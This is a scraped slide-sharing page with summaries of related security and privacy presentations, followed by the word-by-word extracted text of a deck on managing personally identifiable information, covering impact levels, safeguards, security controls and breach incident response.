This document provides an overview of the costs associated with data breaches. It begins by introducing the speakers and the agenda. It then discusses what constitutes a data breach and the types of data that may be exposed, such as PII, PHI, intellectual property, and financial information. The document outlines direct and indirect costs of breaches, including response costs, lost productivity, fines, and reputation damage. It provides estimates of costs from studies and actual breaches, which range from hundreds of thousands to over $170 million depending on the size and type of breach. Patterns in breach cost data are discussed. The document aims to help organizations understand and plan for the potential financial impact of a data security incident.
The document discusses PIPEDA, Canada's private sector privacy law, and the importance of having an Incident Response Plan (IRP) to respond to data breaches. It provides an overview of PIPEDA's 10 fair information principles and requirements regarding data breaches. It emphasizes that an IRP outlines the steps to detect, respond to, and reduce the risk of future incidents. It also stresses engaging legal counsel to maintain privilege and avoid liability when developing, implementing, and responding to breaches according to the IRP.
3rd Party Risk: Practical Considerations for Privacy & Security Due DiligenceResilient Systems
This document provides an overview of 3rd party risk due diligence best practices for privacy and security. It discusses using questionnaires and on-site reviews to assess 3rd party vendors. It also addresses considerations for evaluating foreign service providers, such as the scope of services, data sensitivity, geographic factors, business continuity, local laws, legal risks, and security controls. The document provides examples of key questions to include in a questionnaire and areas to focus on during an on-site review.
This document summarizes a seminar on cybersecurity insurance. It discusses the presenters and provides examples of data breach headlines. It then explains the threats to data, including internal and external threats. The document outlines the immediate expenses of a data breach such as notification, call centers, credit monitoring, legal expenses, and forensics. Finally, it discusses the typical costs of a data breach, which can range from hundreds of thousands to millions of dollars depending on the size and type of breach.
Next Dimension and Siskinds PIPEDA Legislation Updates as of November 1 2018Next Dimension Inc.
Siskinds, a leading Law Firm in Ontario, presented updates on PIPEDA legislation including what you need to know, and what you need to do in order to ensure your company is compliant.
This document discusses insider threats in healthcare organizations. It defines an insider threat as a person with access to an organization's assets, information, or systems who could use that access to negatively impact the organization. The document outlines different types of insider threats including careless workers, malicious insiders, disgruntled employees, and third parties. It also discusses key risks, indicators of insider threats, real world examples, and methods for preventing, detecting, and responding to insider threats.
Crossing the streams: How security professionals can leverage the NZ Privacy ...Chris Hails
Security professionals often struggle with the ‘double intangibility’ of security - the intangibility of risk and intangibility of protection.
Changes hearts and minds often requires legislation and new compliance frameworks to motivate investment.
New Zealand's new Privacy Act comes into play on 1st December 2020 and there are ways security professionals can leverage new aspects including mandatory breach notifications to focus efforts on securing personal information and preventing privacy harms.
The document discusses security awareness and the growing threat of cyber attacks and data breaches. It notes that malware has become more sophisticated, targeting data and businesses rather than just PCs. The impacts of data breaches can include high costs for businesses. It recommends practicing defense in depth across networks, endpoints, and security tools to balance risk and costs. Cyber/privacy breach insurance can help cover liabilities and costs imposed by laws and regulations in the event of a security incident.
The document provides an overview of data breaches based on an analysis of publicly disclosed breach incidents from 2005 to 2015. It finds that while large, "sensational" breaches receive headlines, the majority of breaches are smaller in size. The most common methods of breaches are hacking and theft, while the most compromised records are personal identifying information. Healthcare, government, retail, and financial organizations are most commonly affected. Defenses against breaches are an ongoing challenge as attacks increase in sophistication over time.
Securing Your "Crown Jewels": Do You Have What it Takes?IBM Security
Securing Your "Crown Jewels": Do You Have What it Takes to Go From Start to Finish?
Protecting Your Most Valuable Data: Organizations face many data protection challenges, but one of the biggest is identifying and prioritizing the 0.01% - 2% of the data that is most important to your organization's survival and success. IBM Data Security Services can help by providing you with a 5-stage strategy designed to ensure that your "Crown Jewels" are protected and kept safe from loss, hackers, and being compromised. Attend this session and learn about processes to identify and prioritize your critical data, and services available from IBM to protect it.
Stop occupational fraud - Three simple steps to help stop fraudWynyard Group
Three simple steps can help companies counter internal fraud: 1) be proactive in identifying fraud risks through education and enforcing policies; 2) strengthen employment policies such as background checks and monitoring employee behavior; 3) employ data analytics tools to quickly analyze large amounts of data to identify suspicious patterns and mitigate risks early before significant damage occurs. Wynyard provides powerful software and analytics to help identify fraud and protect organizations.
FireEye Cyber Defense Summit 2016 Now What - Before & After The BreachFireEye, Inc.
Recognize the business impact, own the risk, educate stakeholders, and prepare the organization for the breach. The document discusses the average costs of data breaches, quantifiable and difficult to measure impacts of incidents, and intangible impacts on consumer confidence and public perception. It emphasizes directly engaging stakeholders, understanding business needs, communicating risk effectively, having incident response plans, security controls, and ongoing monitoring to prepare for an inevitable breach.
The document discusses preparing for and responding to cybersecurity incidents and data breaches. It provides an overview of Breach Education Alliance, an integrated team approach for responding to breaches. It then discusses best practices for security investigations, including establishing goals and understanding common causes of incidents. Potential mistakes in investigations and security are outlined. The document emphasizes training employees, understanding your environment and business risks, and having the proper resources in place before, during and after a security incident.
2011 hildebrandt institute cio forum data privacy and security presentation...David Cunningham
The document discusses a presentation on leveraging IT in times of fiscal restraint to support evolving law firm business models, with specific focus on data privacy and security risk management and competitive advantage. Speakers include CISOs and IT risk managers from law firms who cover topics like data regulations, examples of regulated data, information security roles, ISO 27001 certification, audits, components of information security programs, service provider management, and contractual controls. The presentation then ends with a question and answer session.
Panel Cyber Security and Privacy without Carrie Waggonermihinpr
The panel discussed security and privacy in healthcare. Some key points:
- 43% of all 2011 security breaches began in healthcare according to Symantec.
- Medical records are valued at $50 each on the black market, much more than credit cards.
- Top threats to healthcare security are malware, automatic log-off not being used, and removable media.
- HIPAA compliance does not ensure security. Access must be controlled and critical data identified.
- Presenters provided overviews of trust frameworks, Direct secure messaging between providers, and the role of digital certificates in authentication. Ensuring security requires addressing both technical and human factors.
Similar to Managing Personally Identifiable Information (PII) (20)
2. What
is
PII?
Personally
Iden0fiable
Informa0on
(PII)
is
any
informa0on,
maintained
by
a
company,
which:
• can
be
used
to
dis0nguish
or
trace
an
individual’s
iden0ty
• is
linked
or
linkable
to
an
individual
Examples
of
PII:
• Name,
Address,
SSN,
Date
of
Birth,
Phone
Number
• Device
specific
sta0c
iden0fier
(e.g.,
IP
Address,
UDID,
etc.)
• Logs
of
user
ac0ons
• Financial,
Employment
or
Loca0on
data
Page:
2
3. PII
Data
Breaches
(2010/2011)
>
77M
Users
32M
Users
45
out
of
51
companies
surveyed
had
a
data
breach
in
2010
(Symantec
sponsored
study
carried
out
by
Ponemon
Ins0tute)
Page:
3
5. PII
and
the
Law
US
Government
Ac0ons:
• Federal
Grand
Jury
inves0ga0ng
mobile
apps
and
the
data
they
transmit
about
user
ac0ons
• Boucher-‐Stearns
draY
bill
• Rush:
Best
Prac0ces
Act
of
2011
(draY)
• Pending/current
state
laws
&
rules
regula0ng
use
of
PII
Page:
5
6. Other
Impacts
of
a
PII
Breach
Loss
of
customers
Revenue
loss
Drop
in
customer
confidence
Adverse
publicity
Departure
of
key
employees
Sony
execu0ves
apologize
aYer
recent
data
breach
Average
cost
per
compromised
record:
$266
Page:
6
7. Steps
to
Managing
PII
Assess
Confiden0ality
Impact
Levels
for
PII
collected
and
used
by
the
organiza0on
Implement
Appropriate
Controls
• Opera0onal
Safeguards
• Privacy
Safeguards
• Security
Controls
Prepare
Incident
Responses
for
Data
Breaches
Page:
7
8. Confiden0ality
Impact
Levels
-‐
I
The
confiden0ality
of
PII
should
be
protected
based
on
its
impact
level.
Items
of
PII
which
do
not
need
protec0on
include:
• Publicly
available
informa0on
(phone
book)
• Informa0on
voluntarily
shared/disclosed
• Informa0on
that
organiza0on
has
permission
or
authority
to
release
publicly
Assess
the
harm
caused
by
a
breach
of
confiden0ality
• Individual
Harm:
Relates
to
adverse
affects
experienced
by
an
individual
when
a
breach
of
confiden0ality
occurs
with
their
PII
• Organiza>onal
Harm:
This
may
take
the
form
of
financial
losses,
loss
of
public
reputa0on
and
public
confidence,
legal
liability
and
addi0onal
administra0ve
work
Page:
8
9. Confiden0ality
Impact
Levels
-‐
II
Impact
Level
LOW
MODERATE
HIGH
Impact
Type
Limited
Mission
capability
Significant
Degrada0on
Severe
Degrada0on
Degrada0on
Organiza0onal
Assets
Minor
Damage
Significant
Damage
Major
Damage
Financial
Loss
Minor
Significant
Major
Significant;
does
not
Catastrophic;
involves
Harm
to
Individuals
Minor
involve
loss
of
life
or
loss
of
life
or
serious
serious
injuries
injuries
Page:
9
10. Confiden0ality
Impact
Levels
–
III
The
following
factors
must
be
considered
while
determining
impact
levels:
Iden>fiability:
Evaluate
how
easily
PII
can
be
used
to
iden0fy
specific
individuals
• SSNs
can
uniquely
and
directly
iden0fy
individuals
(High)
• Zip
Code
or
Date
of
Birth
can
significantly
narrow
a
list
(Moderate)
Quan>ty
of
PII:
Consider
how
many
individuals
are
iden0fied
in
the
informa0on
• 25
records
(Low)
versus
2
million
records
(High)
Data
Field
Sensi>vity:
Evaluate
the
sensi0vity
of
each
individual
PII
data
field
as
well
as
sensi0vity
of
the
fields
together
• An
individual’s
SSN
is
more
sensi0ve
than
his
phone
number
• A
combina0on
of
name
and
address
is
more
sensi0ve
than
either
one
by
itself
• Some
data
fields
have
higher
poten0al
for
harm
when
used
in
contexts
other
than
their
intended
use.
E.g.,
mother’s
maiden
name,
place
of
birth
are
oYen
used
to
recover
account
passwords
Page:
10
11. Confiden0ality
Impact
Levels
-‐
IV
Context
of
Use:
This
is
the
purpose
for
which
PII
is
collected
and
used
• E.g.,
providing
services,
behavioral
analysis,
evalua0on
of
preferences,
serving
up
ads,
sta0s0cal
analysis
or
law
enforcement
• Important
for
understanding
how
disclosure
can
harm
individuals
and
the
organiza0on
• Relevant
to
evalua0ng
impact
to
different
categories
of
people
–
list
of
newslemer
subscribers
compared
to
list
of
law
enforcement
officers
Obliga>on
to
Protect
Confiden>ality:
• There
may
be
legal
or
contractual
obliga0ons
to
protect
PII.
The
collected
PII
may
being
assigned
higher
impact
levels
as
a
result
Access
to
and
Loca>on
of
PII:
Factors
to
consider:
• Number
of
people
who
have
access
to
PII
• Frequency
of
access
• Remote,
offsite
or
offshore
access
or
backups
• Accessed
or
carried
around
by
mobile
workers
Page:
11
12. Opera0onal
Safeguards
Create
Policies
and
Procedures
in
the
following
areas:
• Access
Rules
for
PII
• PII
Reten0on
Schedules
and
Procedures
• PII
Incident
and
Data
Breach
No0fica0on
• Privacy
in
the
SDLC
process
• Limita0on
of
collec0on,
disclosure,
sharing
and
use
of
PII
• Consequences
for
failure
to
follow
these
policies
Training
and
Educa0on:
• Designed
to
change
behavior
or
reinforce
PII
prac0ces
• Focus
amen0on
on
protec0on
of
PII
• Updates
on
the
latest
scams
and
breaches
and
their
impacts
• Examples
of
how
staff
involved
in
inappropriate
ac0ons
have
been
held
accountable
• Examples
of
recommended
prac0ces
• Specific
role-‐based
training
Page:
12
13. Privacy
Safeguards
-‐
I
Minimize
the
Collec0on,
Use
and
Reten0on
of
PII.
This
is
the
“minimum
necessary”
principle
• Collect
only
those
items
of
PII
which
are
essen0al
to
meet
the
organiza0on’s
business
purpose
• If
PII
serves
no
current
purpose,
then
it
should
no
longer
be
collected
and
used
• Check
if
previously
collected
PII
is
s0ll
relevant
and
necessary.
If
not,
then
the
PII
must
be
properly
destroyed.
Ensure
that
destruc0on
conforms
to
any
legal
or
contractual
requirements
Conduct
a
Privacy
Impact
Assessment
(PIA).
This
is
a
structured
process
to
iden0fy
confiden0ality
risks
at
every
stage
of
SDLC.
Collect
details
of:
• PII
to
be
collected
• Reason
for
collec0ng
this
PII
• The
intended
use
of
the
PII
• How
the
PII
will
be
secured
Page:
13
14. Privacy
Safeguards
-‐
II
De-‐Iden0fying
Informa0on:
• Full
data
records
not
always
required.
E.g.,
correla0ons,
trend
analysis
• Obscure
enough
PII
so
that
remaining
informa0on
does
not
iden0fy
an
individual
• May
be
re-‐iden0fied
via
a
code
or
algorithm
assigned
to
each
record
• Re-‐iden0fying
code
or
algorithm
should
not
be
derived
from
other
related
informa0on
about
the
individual
• Means
of
re-‐iden0fica0on
should
only
be
known
to
authorized
staff
and
not
disclosed
to
anyone
without
the
authority
to
re-‐iden0fy
records
• Can
be
assigned
a
PII
confiden0ality
impact
level
of
LOW
provided
the
following
condi0ons
are
both
true:
The
re-‐iden0fica0on
algorithm
or
code
is
maintained
in
a
separate
system,
with
controls
to
prevent
unauthorized
access;
and
The
data
elements
are
not
linkable,
via
public
records
or
other
reasonably
available
external
records
in
order
to
re-‐iden0fy
the
data
Page:
14
15. Privacy
Safeguards
-‐
III
Anonymized
Informa0on:
• De-‐iden0fied
informa0on
for
which
a
code
or
algorithm
for
re-‐
iden0fica0on
no
longer
exists
• Informa0on
is
no
longer
PII
• Usually
involves
applica0on
of
disclosure
limita0on
techniques
like:
Generalizing
the
Data
–
making
informa0on
less
precise
Suppressing
the
Data
–
Dele0ng
an
en0re
record
or
certain
parts
of
a
record
Introducing
Noise:
Adding
small
amounts
of
varia0on
into
selected
data
Swapping
Data:
Exchanging
data
fields
of
one
record
with
the
same
data
fields
of
another
similar
record
(e.g.,
swapping
ZIP
codes
of
two
records)
Replacing
data
with
the
average
value
–
replacing
a
selected
value
of
data
with
the
average
value
for
the
en0re
group
of
data
• Useful
for
system
tes0ng
since
realis0c
proper0es
are
retained
Cau>on:
PII
used
in
test
environments
requires
the
same
level
of
protec0on
as
in
produc0on
environment
Page:
15
16. Security
Controls
-‐
I
Specific
security
controls
should
be
established
to
ensure
confiden0ality
of
PII
Access
Controls:
• Iden>fica>on
and
Authen>ca>on:
Users
must
be
uniquely
iden0fied
and
authen0cated
prior
to
accessing
PII.
Typically,
two-‐factor
authen0ca0on
is
required
as
well
as
a
0me-‐
out
func0on
for
remote
access
• Enforcement:
Control
access
to
PII
through
role-‐based
access
control
to
allow
each
user
to
only
access
pieces
of
data
necessary
for
the
user’s
role;
or
allow
access
only
through
an
applica0on
which
0ghtly
restricts
access
to
PII
• Least
Privilege:
Ensure
that
users
only
have
access
to
the
minimum
amount
of
PII,
along
with
those
privileges
–
read,
write,
execute
–
that
are
necessary
to
perform
their
work
• Remote
Access:
Prohibit
or
strictly
limit
access
to
PII.
If
remote
access
is
permimed,
ensure
that
the
communica0ons
are
encrypted
• Mobile
Devices:
Prohibit
or
strictly
limit
access
to
PII
from
portable
or
mobile
devices
because
these
are
generally
higher-‐risk
than
non-‐portable
devices.
If
access
is
permimed,
ensure
devices
are
properly
secured
with
up-‐to-‐date
an0-‐malware
soYware
and
OS
patches
• Media
Access:
Restrict
access
to
media
(CDs,
USB
flash
drives,
tapes,
paper,
etc.)
containing
PII
Page:
16
17. Security
Controls
-‐
II
Separa>on
of
Du>es:
Enforce
separa0on
of
du0es
for
roles
involving
access
to
PII.
For
example,
users
of
de-‐iden0fied
data
should
not
also
be
in
roles
that
permit
them
to
access
the
codes
needed
to
re-‐iden0fy
the
records
Monitoring
and
Audits:
• Monitor
all
access
to
PII
to
detect
unauthorized
access
events
or
amempts
• Monitor
PII
internally
or
at
network
boundaries
for
unusual
or
suspicious
data
transfers
• Regularly
review
and
analyze
system
logs
for
indica0ons
of
inappropriate
or
unusual
ac0vity
affec0ng
PII
and
inves0gate
suspicious
ac0vity
or
suspected
viola0ons
Page:
17
18. Security
Controls
-‐
III
Media
Handling:
• Marking:
Label
media
containing
PII
to
indicate
how
it
should
be
distributed
and
handled
• Storage:
PII
on
paper
or
on
digital
media
must
be
securely
stored
un0l
it
is
destroyed
or
sani0zed.
For
example,
encrypt
data
stored
on
storage
drives,
backup
taps
and
removable
media
• Transport:
Protect
media
and
mobile
devices
containing
PII
that
is
transported
outside
the
organiza0on’s
controlled
areas
• Sani>za>on:
Sani0ze
media
containing
PII
before
it
is
disposed
or
released
for
reuse
Informa>on
Transmission:
Protect
the
confiden0ality
of
transmimed
PII
either
by
encryp0ng
the
communica0ons
or
by
encryp0ng
the
informa0on
before
it
is
transmimed
Page:
18
19. Incident
Responses
-‐
I
Breaches
involving
PII
must
be
handled
differently
from
other
incidents
because
there
are
specific
features
and
risks
associated
with
breaches
involving
PII
which
may
not
be
associated
with
other
incidents.
Prepara>on
• Integrate
response
plans
for
PII
breaches
into
exis0ng
incident
response
plans.
• Train
en0re
staff
on
policies
and
procedures
• Carry
out
simula0on
exercises
to
evaluate
whether
exis0ng
procedures
are
adequate
and
to
assess
whether
staff
are
able
to
perform
their
roles
as
required
• Employees
must
clearly
know
how
to
iden0fy
a
PII
breach
and
what
informa0on
about
the
breach
needs
to
be
reported
• Employees
must
be
able
to
report
any
breach
involving
PII
immediately,
24x365
• Iden0fy
person
or
commimee
(named
members)
responsible
for
coordina0ng
organiza0ons
response
Page:
19
20. Incident
Responses
-‐
II
Informa>on
to
be
collected
about
Breach
• Person
repor0ng
the
incident
• Person
who
discovered
the
breach
• Date
and
0me
the
breach
was
discovered
• Nature
of
the
incident
• Name
of
system
and
possible
interconnec0vity
with
other
systems
• Descrip0on
of
informa0on
lost
or
compromised
• Controls
in
place
to
prevent
unauthorized
use
of
compromised
informa0on
• Number
of
individuals
poten0ally
affected
• Storage
medium
from
which
informa0on
was
compromised
• Whether
law
enforcement
was
contacted
Elements
of
Breach
No>fica>on
plans
• Whether
no0fica0on
to
affected
individuals
is
required
• Timeliness
of
the
no0fica0on
• Source
of
the
no0fica0on
• Contents
of
the
no0fica0on
• Means
of
providing
the
no0fica0on
• Who
receives
the
no0fica0on;
public
outreach
response
• What
ac0ons
were
taken
and
by
whom
Page:
20
21. Incident
Responses
-‐
III
Breach
Detec>on
&
Analysis
• Evaluate
all
incidents
to
check
if
a
breach
of
PII
is
involved
Containment,
Eradica>on
&
Recovery
• Media
sani0za0on
may
be
required
when
PII
is
deleted
during
recovery
from
a
breach
• Check
if
PII
needs
to
be
preserved
for
evidence;
check
with
legal
counsel
prior
to
sani0zing
PII
• Use
forensics
techniques
to
ensure
preserva0on
of
evidence
• Determine
whether
PII
was
accessed
and
how
many
records
or
individuals
were
affected
Post-‐incident
Ac>vity
• Conduct
retrospec0ve
analysis
to
gather
key
lessons
• Share
informa0on
and
lessons
learned
within
organiza0on
as
well
as
with
external
agencies
as
required.
• Update
incident
response
plan
as
required
Page:
21